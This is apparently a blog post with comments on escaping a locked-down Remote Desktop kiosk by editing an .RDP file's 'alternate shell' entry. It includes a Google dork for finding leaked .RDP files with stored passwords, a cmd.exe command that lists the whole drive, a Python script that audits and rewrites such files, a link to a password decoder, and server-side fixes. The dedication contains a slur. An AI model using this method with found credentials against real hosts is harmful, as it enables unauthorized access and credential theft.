
::: Windows Remote Desktop :::
::: Command Execution Vuln. :::
::: Written by Koshi and Yousif Yalda :::
heykoshi[at]gmail[dot]com // Yousif[at]vapt-sec[dot]com
RDP Remote Command Execution / Priv-esc.
Disclaimer:
We are not to be held responsible for any use of this document other than it being educational.
We found this while trying to run a few programs and commands on a Windows XP SP2 system on which the administrator had disabled pretty much everything: the command prompt, right-clicking, and execution of any program other than the few he or she had explicitly allowed. The only access we had was an .RDP file we had found on Google. Inside that file were a username and a password. No wonder the system was so locked down; the credentials were sitting in plain view, just waiting to be used. So I tried to use them, and nothing worked except the following...
Below is a .RDP file saved by Windows
Some things have been changed and
removed for the sake of the original owners.
( username/password(s) have been removed )
( server has been changed for this as well )
##################################################### <--- Sniff these up..
screen mode id:i:1
desktopwidth:i:800
desktopheight:i:600
session bpp:i:16
winposstr:s:0,3,0,0,800,572
full address:s:SERVERADDRESS Ex. 127.0.0.1
compression:i:1
keyboardhook:i:2
audiomode:i:0
redirectdrives:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
displayconnectionbar:i:1
autoreconnection enabled:i:1
domain:s:DOMAINNAMEHERE
alternate shell:s:C:\vSoftware\vsoft.exe
shell working directory:s:C:\vSoftware\
disable wallpaper:i:1
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
password 51:b:MS_ENCODED_PASSWORD ( DPAPI blob written by mstsc.exe; the decoder tools only recover it under the same Windows user profile that saved the file )
##################################################### <--- Sniff these up..
Well, that is the .RDP file, almost exactly as we found it.
Upon entering this system, I was shown a piece of software made by the company that owned the system we were auditing. I had no Desktop, no Start Menu, nothing.
See where it says "alternate shell:s:C:\vSoftware\vsoft.exe"
and "shell working directory:s:C:\vSoftware\" ?
Well, that is where the vulnerability lies: the initial program is a client-side setting. The RDP client sends "alternate shell" and "shell working directory" to the server as part of its connection request, and unless the server overrides them, it launches whatever program the client names as the session's shell in place of explorer.exe.
Change "alternate shell:s:" to something like
alternate shell:s:explorer.exe
and suddenly you have a Start menu and possibly a file or web browser. Fair enough, given how restricted this environment is...
Now change it to
alternate shell:s:cmd.exe /C dir /s /l /b C:\*.* && pause
You can now watch the entire file tree of C:\ scroll past on the screen...
...even though the account has no right to open a command prompt....
You can also change "shell working directory:s:" if you like, since that is the directory your command runs in. Be sure to append && pause: cmd.exe /C exits as soon as the command completes, and when the initial program exits the session ends and the window closes before you can read the output.
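The following is an added example, not code from the original post. It parses .RDP files using the grammar visible in the listing above (one "name:type:value" entry per line, type i for integer, s for string, b for hex-encoded binary), audits a file for the things this post is about (a stored "password 51" blob, a client-chosen "alternate shell", device redirection), and applies the trick described above by rewriting the alternate shell. The sample file is constructed for the example; the hostname and the truncated DPAPI blob are placeholders, not real data.

```python
"""Parse, audit and rewrite Microsoft .rdp files.

Added example (not the original post's code). Entry values may themselves
contain colons ("full address:s:host:3389"), so a line is split only on its
first two colons. mstsc.exe normally writes the file as UTF-16-LE with a
byte-order mark; load_rdp() accepts that as well as plain ASCII/UTF-8.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample modelled on the listing in the post; not a real target.
# The "password 51" value is the truncated start of a DPAPI blob, used only
# as a stand-in for the stored credential.
SAMPLE_RDP = """screen mode id:i:1
full address:s:rdp.example.invalid:3389
username:s:kiosk
domain:s:EXAMPLE
alternate shell:s:C:\\vSoftware\\vsoft.exe
shell working directory:s:C:\\vSoftware\\
redirectdrives:i:0
redirectprinters:i:1
redirectsmartcards:i:1
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB
"""

Entry = Tuple[str, str]  # (type letter, raw value)


def parse_rdp(text: str) -> Dict[str, Entry]:
    """Parse "name:type:value" lines; later entries override earlier ones."""
    entries: Dict[str, Entry] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.count(":") < 2:
            continue  # blank line or not an entry
        name, typ, value = line.split(":", 2)
        if typ not in ("i", "s", "b"):
            raise ValueError(f"unknown entry type in {line!r}")
        entries[name] = (typ, value)
    return entries


def load_rdp(data: bytes) -> Dict[str, Entry]:
    """Decode a file as saved by mstsc.exe (UTF-16 with BOM) or as plain text."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return parse_rdp(data.decode("utf-16"))
    return parse_rdp(data.decode("utf-8-sig"))


@dataclass
class Finding:
    severity: str
    key: str
    detail: str


def audit_rdp(entries: Dict[str, Entry]) -> List[Finding]:
    """Flag the settings an auditor (or an attacker) cares about."""
    findings: List[Finding] = []
    if "password 51" in entries:
        findings.append(Finding("high", "password 51",
                                "stored credential (DPAPI blob, recoverable "
                                "under the profile that saved the file)"))
    if entries.get("username", ("s", ""))[1]:
        findings.append(Finding("medium", "username", "account name disclosed"))
    shell = entries.get("alternate shell", ("s", ""))[1]
    if shell:
        findings.append(Finding("medium", "alternate shell",
                                f"initial program {shell!r} is chosen by the "
                                "client; the server must override it"))
    for key in ("redirectdrives", "redirectprinters",
                "redirectcomports", "redirectsmartcards"):
        if entries.get(key, ("i", "0"))[1] == "1":
            findings.append(Finding("low", key, "device redirection enabled"))
    return findings


def hijack_shell(entries: Dict[str, Entry], command: str,
                 workdir: str | None = None) -> Dict[str, Entry]:
    """The post's trick: replace the kiosk program the client asks for."""
    patched = dict(entries)
    patched["alternate shell"] = ("s", command)
    if workdir is not None:
        patched["shell working directory"] = ("s", workdir)
    return patched


def dump_rdp(entries: Dict[str, Entry]) -> str:
    """Serialize back to the one-entry-per-line text form."""
    return "".join(f"{name}:{typ}:{value}\n"
                   for name, (typ, value) in entries.items())


if __name__ == "__main__":
    parsed = parse_rdp(SAMPLE_RDP)
    for f in audit_rdp(parsed):
        print(f"[{f.severity}] {f.key}: {f.detail}")
    print(dump_rdp(hijack_shell(parsed, "cmd.exe /C dir /s /l /b C:\\*.* && pause")))
```

Run it against a real file with `load_rdp(open(path, "rb").read())`; the audit output is what to look for when a search engine turns up a stray .RDP file, and `hijack_shell` writes the modified copy this post describes.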
Notes:
Account access of some sort IS required.
Some commands may still be restricted.
This ONLY affects Microsoft Terminal Services / Remote Desktop Protocol, nothing else.
Nonetheless, this should NOT be happening.
As for fixing this: the root cause is that the server honors the initial program supplied by the client. Set the initial program on the server side instead, either on a terminal server in Terminal Services Configuration (RDP-Tcp properties, Environment tab, with the option to override the user profile and client settings) or on any host via the "Start a program on connection" Group Policy, so that the client's "alternate shell" is ignored. Then block cmd.exe and explorer.exe for the restricted account with Software Restriction Policies rather than relying on the kiosk program alone, and never publish .RDP files with saved credentials.
I can see how in a lot of situations this is hardly useful...
...but on locked-down systems it bypasses a lot.
I don't know....go play with it. Don't be a dick....
Oh...I mentioned I found that file on Google, right?
dork: "password" filetype:rdp
------------------------------------
-Dedicated to Lucky225, McGrew and any other faggot who loves to hate. (not the exploit, the song)
9 comments:
Very interesting what Google turns up. So is this sort of like a privilege escalation and information disclosure vulnerability? I do not know much about .rdp files. Very interesting.
@ digitaldefacer, that's exactly what it is, a disclosure vulnerability that allows for priv. escalation.
Identifying Characters (ASCII):
Genvoc.otp
Identifying Characters (Hex):
Asxots.csp
Program registry ID:
P.I.T
RPD MIME Type:
Coded
It looks like fun doesn't it? It would seem you're finding more loops through trial and error, too bad they haven't learned themselves. Keep up the good work, Team.
GodFather
Wow, proof that companies still haven't learned plaintext is unacceptable. But then again, we still have stuff like plain POP3 and telnet in use...
Very interesting, but even though I found many tools to decrypt RDP passwords as suggested by your post (like Cain, RDP PassView and others), none gave me success...
Which one is reliable enough to accomplish this step?
@ jer001, Hmm, not sure; Cain should work just fine, but here's what I used: http://www.oxid.it/ca_um/topics/remote_desktop_password_decoder.htm
lol... haven't I seen this somewhere before? Wait -- I recall seeing this old-ass shit like 2 or 3 years ago on pheer dot org...
http://ph33r.org/updates/2006/6/5/windows-xp-privilege-escalation-exploit.html
http://www.projectstreamer.com/users/r0t0r00t3r/xp_priv_esc-1/xp_priv_esc.html
i forwarded your blog post on this foolishness to the url above. hopefully they too will expose you for the *LAMER* that you are.
-ANONYMOUS
@ Anonymous, identify yourself if you are truly anyone someone should listen to, if you exist. This has been discovered by Koshi and me, and we aren't aware of this posted elsewhere, so give up. Also, I looked at the video and it seems like it has been made recently, about a day ago. Nice try, but just continue to fail because I know you are.
First off, this is neither a "vulnerability" in RDP, nor have you illustrated any "privilege escalation."
If there is an "issue" here, it is that the admin for the company published an RDP file to the internet that had stored credentials to access a publicly accessible RDP host.